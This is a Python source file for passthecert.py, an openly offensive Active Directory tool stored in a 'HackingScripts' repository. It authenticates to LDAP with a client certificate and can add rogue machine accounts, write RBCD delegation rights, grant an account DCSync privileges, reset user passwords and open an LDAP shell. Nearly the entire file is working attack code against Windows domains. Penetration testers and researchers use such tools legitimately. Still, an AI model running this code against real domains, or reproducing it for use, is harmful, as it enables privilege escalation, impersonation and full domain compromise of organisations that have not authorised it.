HackingScripts/win/passthecert.py

700 lines
33 KiB
Python
Raw Permalink Normal View History

2023-10-05 09:41:27 +02:00
#!/usr/bin/env python3
#
# Almond (almond.consulting). Copyright (C) 2022 Almond. All rights reserved.
#
# Accompanying blog post: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# This script implements LDAP certificate authentication for two impacket scripts : addComputer.py and rbcd.py.
#
# If you use Certipy (https://github.com/ly4k/Certipy) to retrieve certificates, you can extract key and cert from the pfx by using:
# $ certipy cert -pfx user.pfx -nokey -out user.crt
# $ certipy cert -pfx user.pfx -nocert -out user.key
#
# Author:
# drm (@lowercase_drm) / ThePirateWhoSmellsOfSunflowers
#
# based on :
# JaGoTu (@jagotu) work on https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py
# Remi Gascou (@podalirius_) and Charlie Bromberg (@_nwodtuhs) work on https://github.com/SecureAuthCorp/impacket/blob/master/examples/rbcd.py
# Impacket by SecureAuth https://github.com/SecureAuthCorp/impacket
#
import sys
import copy
import string
import random
import logging
import argparse
import ssl
import ldap3
import ldapdomaindump
from impacket import version
from impacket.examples import logger
from impacket.examples.ldap_shell import LdapShell as _LdapShell
from impacket.ldap import ldaptypes
from impacket.uuid import string_to_bin
class LdapShell(_LdapShell):
def __init__(self, tcp_shell, domain_dumper, client):
super().__init__(tcp_shell, domain_dumper, client)
self.use_rawinput = True
self.shell = tcp_shell
self.prompt = "\n# "
self.tid = None
self.intro = "Type help for list of commands"
self.loggedIn = True
self.last_output = None
self.completion = []
self.client = client
self.domain_dumper = domain_dumper
def do_dump(self, line):
logging.warning("Not implemented")
def do_exit(self, line):
print("Bye!")
return True
class DummyDomainDumper:
def __init__(self, root: str):
self.root = root
def ldap_shell(ldap_server, ldap_conn):
root = ldap_server.info.other["defaultNamingContext"][0]
domain_dumper = DummyDomainDumper(root)
ldap_shell = LdapShell(sys, domain_dumper, ldap_conn)
try:
ldap_shell.cmdloop()
except KeyboardInterrupt:
print("Bye!\n")
pass
def create_empty_sd():
sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
sd['Revision'] = b'\x01'
sd['Sbz1'] = b'\x00'
sd['Control'] = 32772
sd['OwnerSid'] = ldaptypes.LDAP_SID()
# BUILTIN\Administrators
sd['OwnerSid'].fromCanonical('S-1-5-32-544')
sd['GroupSid'] = b''
sd['Sacl'] = b''
acl = ldaptypes.ACL()
acl['AclRevision'] = 4
acl['Sbz1'] = 0
acl['Sbz2'] = 0
acl.aces = []
sd['Dacl'] = acl
return sd
# Create an ALLOW ACE with the specified sid
def create_allow_ace(sid, guid_str=False):
nace = ldaptypes.ACE()
nace['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
nace['AceFlags'] = 0x00
acedata = ldaptypes.ACCESS_ALLOWED_ACE()
acedata['Mask'] = ldaptypes.ACCESS_MASK()
acedata['Mask']['Mask'] = 983551 # Full control
acedata['Sid'] = ldaptypes.LDAP_SID()
acedata['Sid'].fromCanonical(sid)
if guid_str:
acedata['ObjectType'] = string_to_bin(guid_str)
acedata['ObjectTypeLen'] = len(string_to_bin(guid_str))
acedata['InheritedObjectTypeLen'] = 0
acedata['InheritedObjectType'] = b''
acedata['Flags'] = 1
nace['Ace'] = acedata
return nace
class RBCD(object):
"""docstring for setrbcd"""
def __init__(self, ldap_server, ldap_session, delegate_to):
super(RBCD, self).__init__()
self.ldap_server = ldap_server
self.ldap_session = ldap_session
self.delegate_from = None
self.delegate_to = delegate_to
self.SID_delegate_from = None
self.DN_delegate_to = None
logging.debug('Initializing domainDumper()')
cnf = ldapdomaindump.domainDumpConfig()
cnf.basepath = None
self.domain_dumper = ldapdomaindump.domainDumper(self.ldap_server, self.ldap_session, cnf)
def read(self):
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act
self.get_allowed_to_act()
return
def write(self, delegate_from):
self.delegate_from = delegate_from
# Get escalate user sid
result = self.get_user_info(self.delegate_from)
if not result:
logging.error('Account to escalate does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.SID_delegate_from = str(result[1])
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act and build security descriptor including previous data
sd, targetuser = self.get_allowed_to_act()
# writing only if SID not already in list
if self.SID_delegate_from not in [ ace['Ace']['Sid'].formatCanonical() for ace in sd['Dacl'].aces ]:
sd['Dacl'].aces.append(create_allow_ace(self.SID_delegate_from))
self.ldap_session.modify(targetuser['dn'],
{'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE,
[sd.getData()]]})
if self.ldap_session.result['result'] == 0:
logging.info('Delegation rights modified successfully!')
logging.info('%s can now impersonate users on %s via S4U2Proxy', self.delegate_from, self.delegate_to)
else:
if self.ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s',
self.ldap_session.result['message'])
elif self.ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s',
self.ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', self.ldap_session.result['message'])
else:
logging.info('%s can already impersonate users on %s via S4U2Proxy', self.delegate_from, self.delegate_to)
logging.info('Not modifying the delegation rights.')
# Get list of allowed to act
self.get_allowed_to_act()
return
def remove(self, delegate_from):
self.delegate_from = delegate_from
# Get escalate user sid
result = self.get_user_info(self.delegate_from)
if not result:
logging.error('Account to escalate does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.SID_delegate_from = str(result[1])
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act and build security descriptor including that data
sd, targetuser = self.get_allowed_to_act()
# Remove the entries where SID match the given -delegate-from
sd['Dacl'].aces = [ace for ace in sd['Dacl'].aces if self.SID_delegate_from != ace['Ace']['Sid'].formatCanonical()]
self.ldap_session.modify(targetuser['dn'],
{'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, [sd.getData()]]})
if self.ldap_session.result['result'] == 0:
logging.info('Delegation rights modified successfully!')
else:
if self.ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s',
self.ldap_session.result['message'])
elif self.ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s',
self.ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', self.ldap_session.result['message'])
# Get list of allowed to act
self.get_allowed_to_act()
return
def flush(self):
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act
sd, targetuser = self.get_allowed_to_act()
self.ldap_session.modify(targetuser['dn'], {'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, []]})
if self.ldap_session.result['result'] == 0:
logging.info('Delegation rights flushed successfully!')
else:
if self.ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s',
self.ldap_session.result['message'])
elif self.ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s',
self.ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', self.ldap_session.result['message'])
# Get list of allowed to act
self.get_allowed_to_act()
return
def get_allowed_to_act(self):
# Get target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute
self.ldap_session.search(self.DN_delegate_to, '(objectClass=*)', search_scope=ldap3.BASE,
attributes=['SAMAccountName', 'objectSid', 'msDS-AllowedToActOnBehalfOfOtherIdentity'])
targetuser = None
for entry in self.ldap_session.response:
if entry['type'] != 'searchResEntry':
continue
targetuser = entry
if not targetuser:
logging.error('Could not query target user properties')
return
try:
sd = ldaptypes.SR_SECURITY_DESCRIPTOR(
data=targetuser['raw_attributes']['msDS-AllowedToActOnBehalfOfOtherIdentity'][0])
if len(sd['Dacl'].aces) > 0:
logging.info('Accounts allowed to act on behalf of other identity:')
for ace in sd['Dacl'].aces:
SID = ace['Ace']['Sid'].formatCanonical()
SamAccountName = self.get_sid_info(ace['Ace']['Sid'].formatCanonical())[1]
logging.info(' %-10s (%s)' % (SamAccountName, SID))
else:
logging.info('Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty')
except IndexError:
logging.info('Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty')
# Create DACL manually
sd = create_empty_sd()
return sd, targetuser
def get_user_info(self, samname):
self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % ldap3.utils.conv.escape_filter_chars(samname), attributes=['objectSid'])
try:
dn = self.ldap_session.entries[0].entry_dn
sid = ldap3.protocol.formatters.formatters.format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0])
return dn, sid
except IndexError:
logging.error('User not found in LDAP: %s' % samname)
return False
def get_sid_info(self, sid):
self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % ldap3.utils.conv.escape_filter_chars(sid), attributes=['samaccountname'])
try:
dn = self.ldap_session.entries[0].entry_dn
samname = self.ldap_session.entries[0]['samaccountname']
return dn, samname
except IndexError:
logging.error('SID not found in LDAP: %s' % sid)
return '[Could not resolve SID]', '[Could not resolve SID]'
class ManageUser:
"""docstring for ManageUser"""
def __init__(self, ldapConn, cmdLineOptions):
self.ldapConn = ldapConn
self.__accountName = cmdLineOptions.target
self.__domain = cmdLineOptions.domain
self.__baseDN = cmdLineOptions.baseDN
if self.__baseDN is None:
# Create the baseDN
domainParts = self.__domain.split('.')
self.__baseDN = ''
for i in domainParts:
self.__baseDN += 'dc=%s,' % i
# Remove last ','
self.__baseDN = self.__baseDN[:-1]
if not '.' in self.__domain:
logging.warning('\'%s\' doesn\'t look like a FQDN. Generating baseDN will probably fail.' % self.__domain)
if not self.LDAPUserExists(self.__accountName):
raise Exception("sAMAccountName %s not found in %s!" % (self.__accountName, self.__baseDN))
self.__targetDN, self.__targetSID = self.LDAPGetUser(self.__accountName)
def LDAPUserExists(self, accountName):
res, _ = self.LDAPGetUser(accountName)
return res
def LDAPGetUser(self, accountName):
self.ldapConn.search(self.__baseDN, \
'(sAMAccountName=%s)' % ldap3.utils.conv.escape_filter_chars(accountName), \
attributes=['objectSid'])
try:
dn = self.ldapConn.entries[0].entry_dn
sid = ldap3.protocol.formatters.formatters.format_sid(self.ldapConn.entries[0]['objectSid'].raw_values[0])
return dn, sid
except IndexError:
logging.error('User not found in LDAP: %s' % accountName)
return False, ''
def elevate(self, forestDN=None): # implementation was inspired by @skelsec's `msldap` code
if forestDN is None:
forestDN = self.__baseDN
res = self.ldapConn.search(search_base=self.__baseDN, \
search_filter=f'(distinguishedName={forestDN})', \
attributes=['nTSecurityDescriptor'])
if res is None:
logging.error('Failed to get forest\'s SD')
baseDN_sd = self.ldapConn.entries[0].entry_raw_attributes
if baseDN_sd['nTSecurityDescriptor'] == []:
raise Exception("User doesn't have right read nTSecurityDescriptor!")
sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=baseDN_sd['nTSecurityDescriptor'][0])
new_sd = copy.deepcopy(sd)
for guid in ['1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', \
'1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', \
'89e95b76-444d-4c62-991a-0facbeda640c']:
new_sd['Dacl'].aces.append(create_allow_ace(self.__targetSID, guid))
res = self.ldapConn.modify(forestDN, \
{'nTSecurityDescriptor': [ldap3.MODIFY_REPLACE, [new_sd.getData()]]})
if not res:
if self.ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
raise Exception("User doesn't have right to modify %s!" % (self.__targetDN))
elif self.ldapConn.result['result'] == ldap3.core.results.RESULT_UNWILLING_TO_PERFORM:
raise Exception("Unwilling to Perform: %s" % (self.ldapConn.result['message']))
else:
raise Exception(str(ldapConn.result))
else:
logging.info("Granted user '%s' DCSYNC rights!" % (self.__accountName))
def changePWD(self, newPWD):
if newPWD is False:
newPWD = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32))
res = self.ldapConn.modify(self.__targetDN, \
{'unicodePwd': [(ldap3.MODIFY_REPLACE, ['"{}"'.format(newPWD).encode('utf-16-le')])]})
if not res:
if self.ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
raise Exception("User doesn't have right to modify %s!" % (self.__targetDN))
elif self.ldapConn.result['result'] == ldap3.core.results.RESULT_NO_SUCH_OBJECT:
raise Exception("Target DN '%s' is not correct!" % (self.__targetDN))
elif self.ldapConn.result['result'] == ldap3.core.results.RESULT_UNWILLING_TO_PERFORM:
raise Exception("Password complexity not met. Unwilling to Perform: %s" % (self.ldapConn.result['message']))
else:
raise Exception(str(self.ldapConn.result))
else:
logging.info("Successfully changed %s password to: %s" % (self.__accountName, newPWD))
class ManageComputer:
def __init__(self, ldapConn, cmdLineOptions):
self.options = cmdLineOptions
self.ldapConn = ldapConn
self.__action = cmdLineOptions.action
self.__domain = cmdLineOptions.domain
self.__computerName = cmdLineOptions.computer_name
self.__computerPassword = cmdLineOptions.computer_pass
self.__domainNetbios = cmdLineOptions.domain_netbios
self.__baseDN = cmdLineOptions.baseDN
self.__computerGroup = cmdLineOptions.computer_group
if self.__computerName is None:
if self.__action in ('modify_computer','delete_computer'):
raise ValueError("You have to provide a computer name when using modify_computer or delete_computer.")
else:
if self.__computerName[-1] != '$':
self.__computerName += '$'
if not '.' in self.__domain:
logging.warning('\'%s\' doesn\'t look like a FQDN. Generating baseDN will probably fail.' % self.__domain)
if self.__computerPassword is None:
self.__computerPassword = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32))
if self.__domainNetbios is None:
self.__domainNetbios = self.__domain
if self.__baseDN is None:
# Create the baseDN
domainParts = self.__domain.split('.')
self.__baseDN = ''
for i in domainParts:
self.__baseDN += 'dc=%s,' % i
# Remove last ','
self.__baseDN = self.__baseDN[:-1]
if self.__computerGroup is None:
self.__computerGroup = 'CN=Computers,' + self.__baseDN
logging.debug('The new computer will be added in %s' % self.__computerGroup)
def whoami(self):
current_user = self.ldapConn.extend.standard.who_am_i()
if current_user == None:
raise Exception('whoami command failed, certificate seems not trusted by the Active Directory')
# LDAP whoami returns an authzId, so we strip the prefix
logging.info('You are logged in as: %s' % current_user[2:])
def add_computer(self, constrained_delegations = None):
if self.__computerName is not None:
if self.LDAPComputerExists(self.ldapConn, self.__computerName):
raise Exception("Account %s already exists! If you just want to set a password, use -no-add." % self.__computerName)
else:
while True:
self.__computerName = self.generateComputerName()
if not self.LDAPComputerExists(self.ldapConn, self.__computerName):
break
computerHostname = self.__computerName[:-1]
computerDn = ('CN=%s,%s' % (computerHostname, self.__computerGroup))
# Default computer SPNs
spns = [
'HOST/%s' % computerHostname,
'HOST/%s.%s' % (computerHostname, self.__domain),
'RestrictedKrbHost/%s' % computerHostname,
'RestrictedKrbHost/%s.%s' % (computerHostname, self.__domain),
]
ucd = {
'dnsHostName': '%s.%s' % (computerHostname, self.__domain),
'userAccountControl': 0x1000,
'servicePrincipalName': spns,
'sAMAccountName': self.__computerName,
'unicodePwd': ('"%s"' % self.__computerPassword).encode('utf-16-le')
}
# Add constrained delegations fields to the computer
if constrained_delegations and len(constrained_delegations) > 0:
# Set the TRUSTED_TO_AUTH_FOR_DELEGATION and WORKSTATION_TRUST_ACCOUNT flags
# MS doc: https://learn.microsoft.com/fr-fr/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
ucd['userAccountControl'] = 0x1000000|0x1000
# Set the list of services authorized (format: protocol/FQDNserver)
ucd['msDS-AllowedToDelegateTo'] = constrained_delegations.split(',') #Split multiple services in the command line
logging.info("Adding constrained delegations services to the computer object: %s" % constrained_delegations)
res = self.ldapConn.add(computerDn, ['top','person','organizationalPerson','user','computer'], ucd)
if not res:
if self.ldapConn.result['result'] == ldap3.core.results.RESULT_UNWILLING_TO_PERFORM:
error_code = int(self.ldapConn.result['message'].split(':')[0].strip(), 16)
if error_code == 0x216D:
raise Exception("User machine quota exceeded!")
else:
raise Exception(str(self.ldapConn.result))
elif self.ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
raise Exception("User doesn't have right to create a machine account!")
elif self.ldapConn.result['result'] == ldap3.core.results.RESULT_CONSTRAINT_VIOLATION:
raise Exception("User doesn't have right to create constrained delegations!")
else:
raise Exception(str(self.ldapConn.result))
else:
logging.info("Successfully added machine account %s with password %s." % (self.__computerName, self.__computerPassword))
def delete_computer(self):
if not self.LDAPComputerExists(self.ldapConn, self.__computerName):
raise Exception("Account %s not found in %s!" % (self.__computerName, self.__baseDN))
computer = self.LDAPGetComputer(self.ldapConn, self.__computerName)
res = self.ldapConn.delete(computer.entry_dn)
if not res:
if self.ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
raise Exception("User doesn't have right to delete %s!" % (self.__computerName))
else:
raise Exception(str(self.ldapConn.result))
else:
logging.info("Successfully deleted %s." % self.__computerName)
def modify_computer(self):
if not self.LDAPComputerExists(self.ldapConn, self.__computerName):
raise Exception("Account %s not found in %s!" % (self.__computerName, self.__baseDN))
computer = self.LDAPGetComputer(self.ldapConn, self.__computerName)
res = self.ldapConn.modify(computer.entry_dn, {'unicodePwd': [(ldap3.MODIFY_REPLACE, ['"{}"'.format(self.__computerPassword).encode('utf-16-le')])]})
if not res:
if self.ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
raise Exception("User doesn't have right to modify %s!" % (self.__computerName))
else:
raise Exception(str(self.ldapConn.result))
else:
logging.info("Successfully set password of %s to %s" % (self.__computerName, self.__computerPassword))
def LDAPComputerExists(self, connection, computerName):
connection.search(self.__baseDN, '(sAMAccountName=%s)' % computerName)
return len(connection.entries) ==1
def LDAPGetComputer(self, connection, computerName):
connection.search(self.__baseDN, '(sAMAccountName=%s)' % computerName)
return connection.entries[0]
def generateComputerName(self):
return 'DESKTOP-' + (''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8)) + '$')
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print((version.BANNER))
parser = argparse.ArgumentParser(add_help = True, description = "Manage domain computers and perform RBCD attack via LDAP certificate authentication")
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-port', type=int, choices=[389, 636], default=636,
help='Destination port to connect to. LDAPS (via StartTLS) on 386 or LDAPS on 636.')
group = parser.add_argument_group('Action')
group.add_argument('-action', choices=['add_computer', 'del_computer', 'modify_computer', 'read_rbcd', 'write_rbcd', 'remove_rbcd', 'flush_rbcd', 'modify_user', 'whoami', 'ldap-shell'], nargs='?', default='whoami')
group = parser.add_argument_group('Manage User')
group.add_argument('-target', action='store', metavar='sAMAccountName', help='sAMAccountName of user to target.')
group.add_argument('-new-pass', action='store', metavar='Password', help='New password of target.', const=False, nargs='?')
group.add_argument('-elevate', action='store_true', help='Grant target account DCSYNC rights')
group = parser.add_argument_group('Manage Computer')
group.add_argument('-baseDN', action='store', metavar='DC=test,DC=local', help='Set baseDN for LDAP.'
'If omitted, the domain part (FQDN) '
'specified in the account parameter will be used.')
group.add_argument('-computer-group', action='store', metavar='CN=Computers', help='Group to which the account will be added.'
'If omitted, CN=Computers will be used,')
group.add_argument('-domain', action='store', metavar='test.local', help='Target domain fqdn')
group.add_argument('-domain-netbios', action='store', metavar='NETBIOSNAME', help='Domain NetBIOS name. Required if the DC has multiple domains.')
group.add_argument('-computer-name', action='store', metavar='COMPUTER-NAME$', help='Name of computer to add.'
'If omitted, a random DESKTOP-[A-Z0-9]{8} will be used.')
group.add_argument('-computer-pass', action='store', metavar='password', help='Password to set to computer. '
'If omitted, a random [A-Za-z0-9]{32} will be used.')
group.add_argument('-delegated-services', type=str, action='store', metavar='cifs/srv01.domain.local,ldap/srv01.domain.local', help='Services to configure in constrained delegation to configure to the new computer (no space in the list)')
group = parser.add_argument_group('RBCD attack')
group.add_argument("-delegate-to", type=str, required=False,
help="Target computer account the attacker has at least WriteProperty to")
group.add_argument("-delegate-from", type=str, required=False,
help="Attacker controlled machine account to write on the msDS-Allo[...] property (only when using `-action write`)")
group = parser.add_argument_group('Authentication')
group.add_argument('-dc-host', action='store',metavar = "hostname", help='Hostname of the domain controller to use. '
'If omitted, the domain part (FQDN) '
'specified in the account parameter will be used')
group.add_argument('-dc-ip', action='store',metavar = "ip", help='IP of the domain controller to use. '
'Useful if you can\'t translate the FQDN.')
group.add_argument('-crt', action="store", required=True, metavar = "user.crt", help='User\'s certificate')
group.add_argument('-key', action="store", required=True, metavar = "user.key", help='User\'s private key')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
try:
if options.crt in ('', None) or options.key in ('', None):
logging.critical('Cert and key should be specified!')
sys.exit(1)
if options.domain in ('', None) and options.baseDN in ('', None):
logging.critical('The target domain FQDN (-domain) or a base DN (-baseDN) should be specified!')
sys.exit(1)
if options.dc_ip:
target = options.dc_ip
else:
target = options.dc_host
tls = ldap3.Tls(local_private_key_file=options.key, local_certificate_file=options.crt, validate=ssl.CERT_NONE)
ldap_server_kwargs = {'use_ssl': options.port == 636,
'port': options.port,
'get_info': ldap3.ALL,
'tls': tls}
ldapServer = ldap3.Server(target, **ldap_server_kwargs)
ldap_connection_kwargs = dict()
if options.port == 389:
# I don't really know why, but using this combination of parameters with ldap3 will
# send a LDAP_SERVER_START_TLS_OID and trigger a StartTLS
ldap_connection_kwargs = {'authentication': ldap3.SASL,
'sasl_mechanism': ldap3.EXTERNAL,
'auto_bind': ldap3.AUTO_BIND_TLS_BEFORE_BIND}
ldapConn = ldap3.Connection(ldapServer, **ldap_connection_kwargs)
if options.port == 636:
# According to Microsoft :
# "If the client establishes the SSL/TLS-protected connection by means of connecting
# on a protected LDAPS port, then the connection is considered to be immediately
# authenticated (bound) as the credentials represented by the client certificate.
# An EXTERNAL bind is not allowed, and the bind will be rejected with an error."
# Using bind() function will raise an error, we just have to open() the connection
ldapConn.open()
if options.action in ('modify_user'):
if options.target is None:
logging.critical('-target is required !')
sys.exit(1)
manage = ManageUser(ldapConn, options)
if options.elevate:
manage.elevate()
elif options.new_pass is not None:
manage.changePWD(options.new_pass)
else:
logging.critical('User modification option (-elevate|-new-pass) needed!')
elif options.action in ('add_computer','del_computer','modify_computer', 'whoami', 'ldap-shell'):
manage = ManageComputer(ldapConn, options)
if options.action == 'add_computer':
manage.add_computer(options.delegated_services)
elif options.action == 'del_computer':
manage.delete_computer()
elif options.action == 'modify_computer':
manage.modify_computer()
elif options.action == 'whoami':
manage.whoami()
elif options.action == "ldap-shell":
ldap_shell(ldapServer, ldapConn)
else:
if options.delegate_to is None:
logging.critical('-delegate-to is required !')
sys.exit(1)
rbcd = RBCD(ldapServer, ldapConn, options.delegate_to)
if options.action == 'read_rbcd':
rbcd.read()
elif options.action == 'write_rbcd':
rbcd.write(options.delegate_from)
elif options.action == 'remove_rbcd':
rbcd.remove(options.delegate_from)
elif options.action == 'flush_rbcd':
rbcd.flush()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
print(str(e))